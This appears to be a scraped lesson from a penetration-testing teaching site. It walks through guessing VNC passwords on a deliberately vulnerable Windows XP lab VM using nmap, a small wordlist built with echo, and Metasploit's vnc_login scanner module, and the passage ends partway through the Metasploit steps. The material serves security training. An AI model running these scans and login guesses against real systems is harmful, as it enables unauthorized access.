(Metasploit:
Lesson 14)

The CVE Vulnerability number is
CVE-1999-0506. The vulnerability is where a Windows NT
domain user or administrator account has a default, null, blank, missing password,
or easy to guess password.

What is
the RealVNC?

RealVNC is a company that provides remote
access software. The software consists of a server and client
application for the Virtual Network Computing (VNC) protocol to control
another computer's screen remotely.

The Metasploit Framework is a open source
penetration tool used for developing and executing exploit code against
a remote target machine it, Metasploit frame work has the world's
largest database of public, tested exploits. In simple words, Metasploit
can be used to test the Vulnerability of computer systems in order to
protect them and on the other hand it can also be used to break into
remote systems.

What is Damn Vulnerable Windows XP?

This is a Windows XP Virtual Machine that
provides a practice environment to conduct ethical penetration
testing, vulnerability assessment, exploitation and forensics
investigation.

The Microsoft Software License Terms for
the IE VMs are included in the release
notes.

By downloading and using this
software, you agree to these license
terms.

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered malicious and is against the law.

You can see that the Operating System
Version is Windows XP, running either SP2 or SP3.

Imagine an internet scanner/crawler
whose sole purpose was to look for old WXP/W2K3 servers with
down-leveled service packs.

Instructions:

nmap -A -T4
192.168.1.116

Section 4: Create
Password File

Create Password File

Instructions:

echo "admin"
> /var/tmp/passwd.txt

echo "password"
>>
/var/tmp/passwd.txt

echo "abc123"
>>
/var/tmp/passwd.txt

cat /var/tmp/passwd.txt

Note(FYI):

(>)
is called a redirect operator. In case #1, I am using it to
(1) create a file called /var/tmp/passwd.txt -and- to (2) place
"admin" in the first line.

(>>)
is called an append operator. In case #2 and #3, the string
"password" and "abc123" are appended to the end of the file.

In case #4, we display the new created
file (/var/tmp/passwd.txt) with the cat command.

Section 5: It's
Metasploit Time

Start the Metasploit Framework Console

Instructions:

msfconsole

Set Exploit

Instructions:

use auxiliary/scanner/vnc/vnc_login

Note(FYI):

This module is the VNC Authentication
Scanner.

This module will test a VNC server on a
range of machines and report successful logins. Currently it
supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC
challenge response authentication method.